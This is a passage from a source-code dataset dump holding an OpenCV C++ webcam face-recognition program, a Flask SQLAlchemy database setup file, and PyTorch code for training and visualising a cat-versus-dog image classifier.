separator);\n\t\tgetline(lines, label);\n\n\t\tif (!path.empty() && !label.empty()) {\n\t\t\timages.push_back(imread(path, CV_LOAD_IMAGE_GRAYSCALE));\n\t\t\tlabels.push_back(atoi(label.c_str()));\n\t\t}\n\t}\n}\n#endif\n\nstatic CascadeClassifier face_cascade(\"./haarcascade_frontalface_default.xml\");\t\t//load Cascade\nstatic CascadeClassifier eyes_cascade(\"./haarcascade_eye_tree_eyeglasses.xml\");\nstatic CascadeClassifier nose_cascade(\"./haarcascade_mcs_nose.xml\");\nstatic CascadeClassifier mouth_cascade(\"./haarcascade_mcs_mouth.xml\");\n\nstatic string names[] = {\"Hobo\", \"Liss\", \"Liu Tao\", \"Luo Chuanyou\", \"Ma Wen\",\n\t\t\t\t \"Ren Junze\", \"Tian Heming\", \"Tian Minjie\", \"Zhao Cancan\", \n\t\t\t\t \"Zhao Cong\", \"Zheng Fanglei\"};\n\nstatic void detect_features(Mat& img, Rect& face);\nint main()\n{\n\tPtr<FaceRecognizer> fc = createFisherFaceRecognizer();\n\n#ifdef READ_CSV\n\tstring csvPath = \"./train_data.txt\";\n\n\tvector<Mat> images; \n\tvector<int> labels;\n\tread_csv(csvPath, images, labels);\n\n\tfc->train(images, labels); //train\n\tfc->save(\"./Face_Model.xml\"); //save data after trained.\n#else\n\tfc->load(\"Face_Model.xml\");\n#endif\n\n\tVideoCapture cap(0);\n\tcap.set(CAP_PROP_FRAME_WIDTH, 1280);\n\tcap.set(CAP_PROP_FRAME_HEIGHT, 720);\n\n\tMat image;\n\tvector<Rect> recs;\n\tMat test(200, 200, CV_8UC1);\n\tMat gray;\n\tint x = 0, y = 0;\n\tint predict_label = 0;\n\tdouble predict_confidence = 0.0;\n\n\twhile(1) {\n\t\t//image = imread(\"0_02.jpg\", CV_LOAD_IMAGE_COLOR);\n\t\tbool ret = cap.read(image);\n\t\tif (ret == false) {\n\t\t\tcout << \"Can't get data from cap\" << endl;\n\t\t\tbreak;\n\t\t}\n\n\t\tface_cascade.detectMultiScale(image, recs,1.2,6,0,Size(50,50)); //detect the face\n\t\tfor (int i = 0; i < recs.size();i++) {\n\t\t\trectangle(image, recs[i], Scalar(0, 0, 255));\n\t\t\tx = recs[i].x + recs[i].width / 2;\n\t\t\ty = recs[i].y + recs[i].height / 2;\n\n\t\t\tMat roi = image(recs[i]);\n\t\t\tcvtColor(roi, gray, CV_BGR2GRAY);\n\t\t\tresize(gray, test, Size(200, 200)); //the training sample is 200x200, resize the pic here.\n\n\t\t\tfc->predict(test, predict_label, predict_confidence); \n\t\t\tif (predict_confidence < 800) { \n\t\t\t\tputText(image, names[predict_label], Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t} else {\n\t\t\t\tputText(image, \"Hi, New friends!\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2); \n\t\t\t}\n\t\t\tdetect_features(image, recs[i]);\n\t\t}\n\n\t\timshow(\"Detected\", image);\n\t\tif (waitKey(10) == 27)\n\t\t\tbreak;\n\t}\n\n\treturn 0;\n}\n\nstatic void detect_features(Mat& img, Rect& face)\n{\n\tbool is_full_detection = true;\n//\trectangle(img, Point(face.x, face.y), Point(face.x+face.width, face.y+face.height),\n//\t\t\tScalar(255, 0, 0), 1, 4);\n\n\t// Eyes, nose and mouth will be detected inside the face (region of interest)\n\tMat ROI = img(Rect(face.x, face.y, face.width, face.height));\n\n\tif (!eyes_cascade.empty())\n\t{\n\t\t//detect eyes\n\t\tvector<Rect_<int> > eyes;\n\t\teyes_cascade.detectMultiScale(ROI, eyes, 1.20, 5, 0|CASCADE_SCALE_IMAGE, Size(30, 30));\n\n\t\t// Mark points corresponding to the centre of the eyes\n\t\tfor(unsigned int j = 0; j < eyes.size(); ++j)\n\t\t{\n\t\t\tRect e = eyes[j];\n\t\t\tcircle(ROI, Point(e.x+e.width/2, e.y+e.height/2), 3, Scalar(0, 255, 0), -1, 8);\n\t\t\t/* rectangle(ROI, Point(e.x, e.y), Point(e.x+e.width, e.y+e.height),\n\t\t\tScalar(0, 255, 0), 1, 4); */\n\t\t}\n\t}\n\n\t// Detect nose if classifier provided by the user\n\tdouble nose_center_height = 0.0;\n\tif(!nose_cascade.empty())\n\t{\n\t\tvector<Rect_<int> > nose;\n\t\tnose_cascade.detectMultiScale(ROI, nose, 1.20, 5, 0|CASCADE_SCALE_IMAGE, Size(30, 30));\n\n\t\t// Mark points corresponding to the centre (tip) of the nose\n\t\tfor(unsigned int j = 0; j < nose.size(); ++j)\n\t\t{\n\t\t\tRect n = nose[j];\n\t\t\tcircle(ROI, Point(n.x+n.width/2, n.y+n.height/2), 3, Scalar(0, 255, 0), -1, 8);\n\t\t\tnose_center_height = (n.y + n.height/2);\n\t\t}\n\t}\n\n\t// Detect mouth if classifier provided by the user\n\tdouble mouth_center_height = 0.0;\n\tif(!mouth_cascade.empty())\n\t{\n\t\tvector<Rect_<int> > mouth;\n\t\tmouth_cascade.detectMultiScale(ROI, mouth, 1.20, 5, 0|CASCADE_SCALE_IMAGE, Size(30, 30));\n\n\t\tfor(unsigned int j = 0; j < mouth.size(); ++j)\n\t\t{\n\t\t\tRect m = mouth[j];\n\t\t\tmouth_center_height = (m.y + m.height/2);\n\n\t\t\t// The mouth should lie below the nose\n\t\t\tif( (is_full_detection) && (mouth_center_height > nose_center_height) )\n\t\t\t{\n\t\t\t\trectangle(ROI, Point(m.x, m.y), Point(m.x+m.width, m.y+m.height), Scalar(0, 255, 0), 1, 4);\n\t\t\t}\n\t\t\telse if( (is_full_detection) && (mouth_center_height <= nose_center_height) )\n\t\t\t\tcontinue;\n\t\t\telse\n\t\t\trectangle(ROI, Point(m.x, m.y), Point(m.x+m.width, m.y+m.height), Scalar(0, 255, 0), 1, 4);\n\t\t}\n\t}\n}"
},
{
"alpha_fraction": 0.610027015209198,
"alphanum_fraction": 0.6454518437385559,
"avg_line_length": 24.821704864501953,
"blob_id": "a7b71fc65e9259fe6f3acd6a800503abf4e4a3fd",
"content_id": "a6995083e32f7679de59c79c1a31606be2d9cb4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3331,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 129,
"path": "/face_recg.cpp",
"repo_name": "HoboQian/face_recognize",
"src_encoding": "UTF-8",
"text": "#define _CRT_SECURE_NO_DEPRECATE\n#include <iostream>\n#include <sstream>\n#include <fstream>\n//#include <stdio.h>\n#include <opencv2/core.hpp>\n#include <opencv2/core/utility.hpp>\n#include <opencv2/core/ocl.hpp>\n#include <opencv2/imgcodecs.hpp>\n#include <opencv2/highgui.hpp>\n#include <opencv2/features2d.hpp>\n#include <opencv2/calib3d.hpp>\n#include <opencv2/imgproc.hpp>\n#include <opencv2/flann.hpp>\n#include <opencv2/xfeatures2d.hpp>\n#include <opencv2/ml.hpp>\n#include <opencv2/face.hpp>\n#include <opencv2/face/facerec.hpp>\n#include <opencv2/objdetect.hpp>\n\nusing namespace cv;\nusing namespace std;\nusing namespace cv::xfeatures2d;\nusing namespace cv::ml;\nusing namespace face;\n\n//#define READ_CSV\n\n#ifdef READ_CSV\nvoid read_csv(string& fileName,vector<Mat>& images,vector<int>& labels,char separator = ';')\n{\n\tifstream file(fileName.c_str(), ifstream::in);\n\tif (!file) {\n\t\tcout << \"No valid input file was given, please check the given filename.\" << endl;\n\t\treturn;\n\t}\n\n\tstring line, path, label;\n\n\twhile (getline(file, line)) {\n\t\tstringstream lines(line);\n\t\tgetline(lines, path, separator);\n\t\tgetline(lines, label);\n\n\t\tif (!path.empty() && !label.empty()) {\n\t\t\timages.push_back(imread(path, CV_LOAD_IMAGE_GRAYSCALE));\n\t\t\tlabels.push_back(atoi(label.c_str()));\n\t\t}\n\t}\n}\n#endif\n\nint main()\n{\n\tCascadeClassifier cas(\"./haarcascade_frontalface_default.xml\");\t\t//load Cascade\n\tPtr<FaceRecognizer> fc = createFisherFaceRecognizer();\n\n#ifdef READ_CSV\n\tstring csvPath = \"./train_data.txt\";\n\n\tvector<Mat> images; \n\tvector<int> labels;\n\tread_csv(csvPath, images, labels);\n\n\tfc->train(images, labels); //train\n\tfc->save(\"./Face_Model.xml\"); //save data after trained.\n#else\n\tfc->load(\"Face_Model.xml\");\n#endif\n\n\tVideoCapture cap(0);\n\tcap.set(CAP_PROP_FRAME_WIDTH, 1280);\n\tcap.set(CAP_PROP_FRAME_HEIGHT, 720);\n\n\tMat image;\n\tvector<Rect> recs;\n\tMat test(200, 200, CV_8UC1);\n\tMat gray;\n\tint x = 0, y = 0;\n\n\twhile(1) {\n\t\t//image = imread(\"0_02.jpg\", CV_LOAD_IMAGE_COLOR);\n\t\tbool ret = cap.read(image);\n\t\tif (ret == false) {\n\t\t\tcout << \"Can't get data from cap\" << endl;\n\t\t\tbreak;\n\t\t}\n\n\t\tcas.detectMultiScale(image, recs,1.2,6,0,Size(50,50)); //detect the face\n\t\tfor (int i = 0; i < recs.size();i++) {\n\t\t\trectangle(image, recs[i], Scalar(0, 0, 255));\n\t\t\tx = recs[i].x + recs[i].width / 2;\n\t\t\ty = recs[i].y + recs[i].height / 2;\n\n\t\t\tMat roi = image(recs[i]);\n\t\t\tcvtColor(roi, gray, CV_BGR2GRAY);\n\t\t\tresize(gray, test, Size(200, 200)); //since the training sample is 200x200, so need resize here.\n\n\t\t\tint result = fc->predict(test);\n\t\t\tswitch (result) {\n\t\t\t\tcase 0:\n\t\t\t\t\tputText(image, \"Liu Tao\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tcase 1:\n\t\t\t\t\tputText(image, \"Ren Junze\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tcase 2:\n\t\t\t\t\tputText(image, \"Tian Heming\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tcase 3:\n\t\t\t\t\tputText(image, \"Tian Minjie\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\n\t\t\t\tdefault:\n\t\t\t\t\tputText(image, \"Hi, New Friend\", Point(recs[i].x, recs[i].y), FONT_HERSHEY_SIMPLEX, 1.5, Scalar(0, 0, 255), 2);\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\timshow(\"Detected\", image);\n\t\tif (waitKey(10) == 27)\n\t\t\tbreak;\n\t}\n\n\treturn 0;\n}\n"
}
] | 5 |
andriy-kulish/flask-book-library | https://github.com/andriy-kulish/flask-book-library | 0c5752081c1afe2f046767464cfabc311de253c6 | 8f8a822931a2e40053698073782fa70c95e65f15 | 833a518f360bc576afda5eade8acf59bfb92520c | refs/heads/master | 2021-01-01T18:06:47.855078 | 2014-03-25T07:46:35 | 2014-03-25T07:46:35 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6856403350830078,
"alphanum_fraction": 0.6856403350830078,
"avg_line_length": 32.60869598388672,
"blob_id": "55f3a8f9454d67c72e37c88942c4fdeac99753c6",
"content_id": "d9749b35129a90b84370741de9e204a0b39eab2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 773,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 23,
"path": "/app/database.py",
"repo_name": "andriy-kulish/flask-book-library",
"src_encoding": "UTF-8",
"text": "import os\nfrom app import app\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\nexists = os.path.isfile(app.config['DATABASE'])\nSQLALCHEMY_DATABASE_URI = 'sqlite:///' + app.config['DATABASE']\n\nengine = create_engine(SQLALCHEMY_DATABASE_URI, convert_unicode=True)\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\n\ndef init_db():\n import models\n Base.metadata.drop_all(bind=engine)\n Base.metadata.create_all(bind=engine)\n"
}
] | 1 |
oooolga/IFT6135-A2 | https://github.com/oooolga/IFT6135-A2 | f53199e73bbc16c7288c043a8bb5dd7bf438351e | 0e7f6e6f8821b39750bd7fc903521e4b661826db | e4185d5264dab847798bdf35702f1cd64fe79486 | refs/heads/master | 2021-03-30T18:21:21.013697 | 2017-12-05T02:56:13 | 2017-12-05T02:56:13 | 123,229,629 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6681034564971924,
"alphanum_fraction": 0.6808620691299438,
"avg_line_length": 31.396648406982422,
"blob_id": "927199cb378ca398f7c3338b39aac0c21f9fa117",
"content_id": "67b90d3540bf913379484639b605fa74a832413f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5800,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 179,
"path": "/part2/util.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nimport pdb\nimport numpy as np\nimport argparse, os\nimport copy, glob, math, random\nimport scipy.misc\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\nuse_cuda = torch.cuda.is_available()\n\ntorch.manual_seed(123)\n\nif use_cuda:\n\ttorch.cuda.manual_seed_all(123)\n\nnp.random.seed(123)\nrandom.seed(123)\n\nDATA_PATH = './datasets'\nTRAIN_PATH_OLD = './datasets/train_64x64'\nTEST_PATH_OLD = './datasets/valid_64x64'\nTRAIN_PATH = './datasets/train'\nTEST_PATH = './datasets/test'\nRESULT_PATH = './result'\n\nIMG_PATH = './datasets/PetImages'\n\nGLOBAL_TEMP = None\n\ndef factorization(n):\n\tfrom math import sqrt\n\tfor i in range(int(sqrt(float(n))), 0, -1):\n\t\tif n % i == 0:\n\t\t\tif i == 1: print('Who would enter a prime number of filters')\n\t\t\treturn int(n / i), i\n\ndef visualize_kernel(kernel_tensor, im_name='conv1_kernel.jpg', pad=1, im_scale=100.0,\n\t\t\t\t\t model_name='', rescale=True):\n\n\t# map tensor wight in [0,255]\n\tif rescale:\n\t\tmax_w = torch.max(kernel_tensor)\n\t\tmin_w = torch.min(kernel_tensor)\n\t\tscale = torch.abs(max_w-min_w)\n\t\tkernel_tensor = (kernel_tensor - min_w) / scale * 255.0\n\t\tkernel_tensor = torch.ceil(kernel_tensor)\n\n\t# pad kernel\n\tp2d = (pad, pad, pad, pad)\n\tpadded_kernel_tensor = F.pad(kernel_tensor, p2d, 'constant', 0)\n\n\t# get the shape of output\n\tgrid_Y, grid_X = factorization(kernel_tensor.size()[0])\n\tY, X = padded_kernel_tensor.size()[2], padded_kernel_tensor.size()[3]\n\n\t# reshape\n\t# (grid_Y*grid_X) x y_dim x x_dim x num_chann\n\tpadded_kernel_tensor = padded_kernel_tensor.permute(0, 2, 3, 1)\n\tpadded_kernel_tensor = padded_kernel_tensor.cpu().view(grid_X, grid_Y*Y, X, -1)\n\tpadded_kernel_tensor = padded_kernel_tensor.permute(0, 2, 1, 3)\n\t#padded_kernel_tensor = padded_kernel_tensor.view(1, grid_X*X, grid_Y*Y, -1)\n\n\t# kernel in numpy\n\tkernel_im = np.uint8((padded_kernel_tensor.data).numpy()).reshape(grid_X*X,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t grid_Y*Y, -1)\n\tkernel_im = scipy.misc.imresize(kernel_im, im_scale, 'nearest')\n\tprint '| Saving {}...'.format(os.path.join(RESULT_PATH, model_name+'_'+im_name))\n\tscipy.misc.imsave(os.path.join(RESULT_PATH, model_name+'_'+im_name), kernel_im)\n\n\ndef plot_acc_loss(train_loss, train_acc, val_loss, val_acc, test_loss, test_acc,\n\t\t\t\t model_name=''):\n\n\tplt.clf()\n\tplt.plot(range(len(train_loss)), train_loss, 'ro-', label='train')\n\tplt.plot(range(len(train_loss)), val_loss, 'bs-', label='valid')\n\tplt.plot(range(len(train_loss)), test_loss, 'g^-', label='test')\n\n\tplt.xlabel('Epoch')\n\tplt.ylabel('Loss')\n\n\tplt.title('Epoch vs Loss')\n\tplt.legend(loc=1)\n\tprint '| saving {}...'.format('{}/{}_loss_curve.png'.format(RESULT_PATH, model_name))\n\tplt.savefig('{}/{}_loss_curve.png'.format(RESULT_PATH, model_name))\n\n\tplt.clf()\n\tplt.plot(range(len(train_loss)), train_acc, 'ro-', label='train')\n\tplt.plot(range(len(train_loss)), val_acc, 'bs-', label='valid')\n\tplt.plot(range(len(train_loss)), test_acc, 'g^-', label='test')\n\n\tplt.xlabel('Epoch')\n\tplt.ylabel('Accuracy')\n\n\tplt.title('Epoch vs Accuracy')\n\tplt.legend(loc=4)\n\tprint '| saving {}...'.format('{}/{}_acc_curve.png'.format(RESULT_PATH, model_name))\n\tplt.savefig('{}/{}_acc_curve.png'.format(RESULT_PATH, model_name))\n\ndef plot_error(train_err, val_err, test_err, model_name=''):\n\n\tplt.clf()\n\tplt.plot(range(len(train_err)), train_err, 'ro-', label='train')\n\tplt.plot(range(len(train_err)), val_err, 'bs-', label='valid')\n\t#plt.plot(range(len(train_err)), test_err, 'g^-', label='test')\n\n\tplt.xlabel('Epoch')\n\tplt.ylabel('Loss')\n\n\tplt.title('Epoch vs Error')\n\tplt.legend(loc=1)\n\tprint '| saving {}...'.format('{}/{}_error_curve.png'.format(RESULT_PATH, model_name))\n\tplt.savefig('{}/{}_error_curve.png'.format(RESULT_PATH, model_name))\n\n\ndef seperate_data():\n\n\tif not os.path.exists(TRAIN_PATH):\n\t\tos.makedirs(TRAIN_PATH)\n\t\tos.makedirs(os.path.join(TRAIN_PATH, 'cat'))\n\t\tos.makedirs(os.path.join(TRAIN_PATH, 'dog'))\n\n\t\tfor file in glob.glob(os.path.join(TRAIN_PATH_OLD, 'Cat*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TRAIN_PATH, 'cat', file_name))\n\n\t\tfor file in glob.glob(os.path.join(TRAIN_PATH_OLD, 'Dog*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TRAIN_PATH, 'dog', file_name))\n\n\tif not os.path.exists(TEST_PATH):\n\t\tos.makedirs(TEST_PATH)\n\t\tos.makedirs(os.path.join(TEST_PATH, 'cat'))\n\t\tos.makedirs(os.path.join(TEST_PATH, 'dog'))\n\n\t\tfor file in glob.glob(os.path.join(TEST_PATH_OLD, 'Cat*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TEST_PATH, 'cat', file_name))\n\n\t\tfor file in glob.glob(os.path.join(TEST_PATH_OLD, 'Dog*.jpg')):\n\t\t\tfile_name = os.path.basename(file)\n\t\t\tos.rename(file, os.path.join(TEST_PATH, 'dog', file_name))\n\n\ndef load_data(batch_size=64, test_batch_size=1000):\n\n\ttrain_data = dset.ImageFolder(root=TRAIN_PATH, transform=transforms.ToTensor())\n\ttrain_imgs = random.sample(train_data.imgs, len(train_data))\n\ttrain_data.imgs = train_imgs[:-2499]\n\ttrain_loader = torch.utils.data.DataLoader(train_data,\n\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\n\tvalid_data = dset.ImageFolder(root=TRAIN_PATH, transform=transforms.ToTensor())\n\tvalid_data.imgs = train_imgs[-2499:]\n\tvalid_loader = torch.utils.data.DataLoader(valid_data,\n\t\t\t\t\t\t\t\t\t\t\t batch_size=batch_size, shuffle=True)\n\n\ttest_data = dset.ImageFolder(root=TEST_PATH, transform=transforms.ToTensor())\n\ttest_loader = torch.utils.data.DataLoader(test_data,\n\t\t\t\t\t\t\t\t\t\t\t batch_size=test_batch_size, shuffle=True)\n\n\treturn train_loader, valid_loader, test_loader\n\nfrom model import *\nfrom train_valid import *\nfrom main import *\n\t"
},
{
"alpha_fraction": 0.6491560339927673,
"alphanum_fraction": 0.6668963432312012,
"avg_line_length": 32.36206817626953,
"blob_id": "5357f4b27f2ccdaad4e4c88bed13815052a12a97",
"content_id": "4d22e07e6ec83513bf381798a48fb1ce4ab4b7ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5806,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 174,
"path": "/part2/train_valid.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nfrom util import *\n\ndef _train(model, train_loader, optimizer, verbose):\n\n\tmodel.train()\n\n\tfor batch_idx, (data, target) in enumerate(train_loader):\n\n\t\tif use_cuda:\n\t\t\tdata, target = data.cuda(), target.cuda()\n\n\t\tdata, target = Variable(data, requires_grad=False), Variable(target, requires_grad=False)\n\n\t\toptimizer.zero_grad()\n\t\toutput = model(data)\n\n\t\ttarget = target.view(-1, 1)\n\t\tloss = F.binary_cross_entropy(F.sigmoid(output), target.float())\n\t\tloss.backward()\n\t\toptimizer.step()\n\n\t\tif verbose and batch_idx % 50 == 0:\n\t\t\tprint '| | iter: {}\\tloss: {:.4f}'.format(batch_idx, loss.data[0])\n\n\treturn loss\n\ndef _evaluate_data_set(model, data_loader, get_top_misclassified=None,\n\t\t\t\t\t get_ambiguous=None):\n\n\tmodel.eval()\n\ttotal_loss, correct = 0, 0\n\ttotal_data, total_batch = 0, 0\n\ttop_ims = None\n\tamb_ims = None\n\n\tif get_top_misclassified:\n\t\ttop_ims = np.empty([0,3,64,64])\n\t\ttop_count = 0\n\n\tif get_ambiguous:\n\t\tamb_ims = np.empty([0,3,64,64])\n\t\tamb_count = 0\n\n\tfor batch_idx, (data, target) in enumerate(data_loader):\n\n\t\tif use_cuda:\n\t\t\tdata, target = data.cuda(), target.cuda()\n\n\t\tdata, target = Variable(data, volatile=True, requires_grad=False), \\\n\t\t\t\t\tVariable(target, requires_grad=False)\n\n\t\toutput = model(data)\n\t\t\n\n\t\tout_eval = F.sigmoid(output)\n\n\t\ttarget = target.view(-1, 1)\n\t\ttotal_loss += F.binary_cross_entropy(out_eval, target.float()).data[0]\n\n\t\tif get_top_misclassified and top_count < get_top_misclassified:\n\t\t\t_, top_index = torch.max(torch.abs(target.float()-out_eval),0)\n\t\t\ttop_index = top_index.data[0]\n\t\t\ttop_count += 1\n\t\t\ttop_data = data[top_index].view(1,3,64,64).cpu()\n\t\t\ttop_data = top_data.data.numpy()\n\t\t\ttop_ims = np.concatenate((top_ims, top_data), 0)\n\n\t\tif get_ambiguous and amb_count < get_ambiguous:\n\t\t\t_, amb_index = torch.min(torch.abs(out_eval-0.5),0)\n\t\t\tamb_index = amb_index.data[0]\n\t\t\tamb_count += 1\n\t\t\tamb_data = data[amb_index].view(1,3,64,64).cpu()\n\t\t\tamb_data = amb_data.data.numpy()\n\t\t\tamb_ims = np.concatenate((amb_ims, amb_data), 0)\n\n\t\tout_eval = out_eval.data-0.5\n\n\t\tpredicted = torch.ceil(out_eval).int()\n\t\ttarget = target.int()\n\n\t\tcorrect += (predicted == target.data).sum()\n\n\t\ttotal_data += len(data)\n\t\ttotal_batch += 1\n\n\tavg_loss = total_loss / float(total_batch)\n\taccuracy = correct / float(total_data)\n\n\treturn avg_loss, accuracy, top_ims, amb_ims\n\n\ndef run(model, train_loader, valid_loader, test_loader, model_name, \n\t\ttotal_epoch, lr, opt, momentum, lr_decay=1e-5, weight_decay=5e-5):\n\n\tif opt == 'Adagrad':\n\t\tprint 'Learning rate decay:\\t{}'.format(lr_decay)\n\t\tprint 'Weight decay:\\t\\t{}\\n'.format(weight_decay)\n\t\toptimizer = optim.Adagrad(model.parameters(), lr=lr, lr_decay=lr_decay,\n\t\t\t\t\t\t\t\t weight_decay=weight_decay)\n\tif opt == 'Adam':\n\t\tprint 'Weight decay:\\t\\t{}\\n'.format(weight_decay)\n\t\toptimizer = optim.Adam(model.parameters(), lr=lr,\n\t\t\t\t\t\t\t weight_decay=weight_decay)\n\telse:\n\t\tprint 'Momentum:\\t\\t{}\\n'.format(momentum)\n\t\toptimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum)\n\n\ttrain_acc, valid_acc, test_acc = [], [], []\n\ttrain_loss, valid_loss, test_loss = [], [], []\n\n\tprint('| epoch: {}'.format(0))\n\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, train_loader)\n\ttrain_loss.append(avg_loss)\n\ttrain_acc.append(accuracy)\n\tprint('| train loss: {:.4f}\\ttrain acc: {:.4f}'.format(avg_loss, accuracy))\n\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, valid_loader)\n\tvalid_loss.append(avg_loss)\n\tvalid_acc.append(accuracy)\n\tprint('| valid loss: {:.4f}\\tvalid acc: {:.4f}'.format(avg_loss, accuracy))\n\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, test_loader)\n\ttest_loss.append(avg_loss)\n\ttest_acc.append(accuracy)\n\tprint('| test loss: {:.4f}\\ttest acc: {:.4f}'.format(avg_loss, accuracy))\n\n\t# visualize kernels\n\t#misclassified = torch.ceil(torch.FloatTensor(misclassified).cuda() * 255.0)\n\t#visualize_kernel(misclassified,\n\t#\t\t\t\t im_name='misclassified_epoch_{}.jpg'.format(0),\n\t#\t\t\t\t model_name=model_name, im_scale=1.0, rescale=False)\n\tvisualize_kernel(model.features[1].weight,\n\t\t\t\t\t im_name='conv1_kernel_epoch_{}.jpg'.format(0),\n\t\t\t\t\t model_name=model_name)\n\n\tfor epoch in range(1, total_epoch+1):\n\n\t\tprint('| epoch: {}'.format(epoch))\n\t\t_ = _train(model, train_loader, optimizer, verbose=False)\n\n\t\t# visualize kernels\n\t\tvisualize_kernel(model.features[1].weight,\n\t\t\t\t\t\t im_name='conv1_kernel_epoch_{}.jpg'.format(epoch),\n\t\t\t\t\t\t model_name=model_name)\n\t\t\n\t\t# output training status\n\t\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, train_loader)\n\t\ttrain_loss.append(avg_loss)\n\t\ttrain_acc.append(accuracy)\n\t\tprint('| train loss: {:.4f}\\ttrain acc: {:.4f}'.format(avg_loss, accuracy))\n\t\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, valid_loader)\n\t\tvalid_loss.append(avg_loss)\n\t\tvalid_acc.append(accuracy)\n\t\tprint('| valid loss: {:.4f}\\tvalid acc: {:.4f}'.format(avg_loss, accuracy))\n\t\tavg_loss, accuracy, _ , _ = _evaluate_data_set(model, test_loader)\n\t\ttest_loss.append(avg_loss)\n\t\ttest_acc.append(accuracy)\n\t\tprint('| test loss: {:.4f}\\ttest acc: {:.4f}'.format(avg_loss, accuracy))\n\n\tplot_acc_loss(train_loss, train_acc, valid_loss, valid_acc, test_loss, test_acc,\n\t\t\t\t model_name=model_name)\n\tplot_error(1-np.array(train_acc), 1-np.array(valid_acc), 1-np.array(test_acc),\n\t\t\t model_name=model_name)\n\n\t_, _, misclassified, ambiguous = _evaluate_data_set(model, test_loader, 25, 25)\n\tmisclassified = torch.ceil(torch.FloatTensor(misclassified).cuda() * 255.0)\n\tambiguous = torch.ceil(torch.FloatTensor(ambiguous).cuda() * 255.0)\n\tvisualize_kernel(misclassified,\n\t\t\t\t\t im_name='misclassified_epoch_{}.jpg'.format(epoch),\n\t\t\t\t\t model_name=model_name, im_scale=1.0, rescale=False)\n\tvisualize_kernel(ambiguous,\n\t\t\t\t\t im_name='ambiguous_epoch_{}.jpg'.format(epoch),\n\t\t\t\t\t model_name=model_name, im_scale=1.0, rescale=False)\n\t"
},
{
"alpha_fraction": 0.6061544418334961,
"alphanum_fraction": 0.6603444814682007,
"avg_line_length": 28.855491638183594,
"blob_id": "7423f33f0d6f8e2f806a2d519b6bf15edae85c13",
"content_id": "8877c8b1b5cd162cf3f635f1b8fc0b51f871533e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5167,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 173,
"path": "/part2/model.py",
"repo_name": "oooolga/IFT6135-A2",
"src_encoding": "UTF-8",
"text": "__author__\t= \t\"Olga (Ge Ya) Xu\"\n__email__ \t=\t\"[email protected]\"\n\nfrom util import *\n\nclass Net(nn.Module):\n\n\tdef __init__(self):\n\t\tsuper(Net, self).__init__()\n\n\t\tin_dim = 64, 64, 3\n\t\t# output shape: n x 64 x 64 x 32\n\t\tconv1_kern_size, conv1_out_chan, conv1_stride, conv1_pad = 5, 32, 1, 2\n\t\t# output shape: n x 31 x 31 x 32\n\t\tpool1_size, pool1_stride = 3, 2\n\t\t# output shape: n x 31 x 31 x 64\n\t\tconv2_kern_size, conv2_out_chan, conv2_stride, conv2_pad = 5, 64, 1, 2\n\t\t# output shape: n x 15 x 15 x 64\n\t\tpool2_size, pool2_stride = 3, 2\n\t\t# output shape: n x 15 x 15 x 128\n\t\tconv3_kern_size, conv3_out_chan, conv3_stride, conv3_pad = 3, 128, 1, 1\n\t\t# output shape: n x 15 x 15 x 128\n\t\tconv4_kern_size, conv4_out_chan, conv4_stride, conv4_pad = 3, 128, 1, 1\n\t\t# output shape: n x 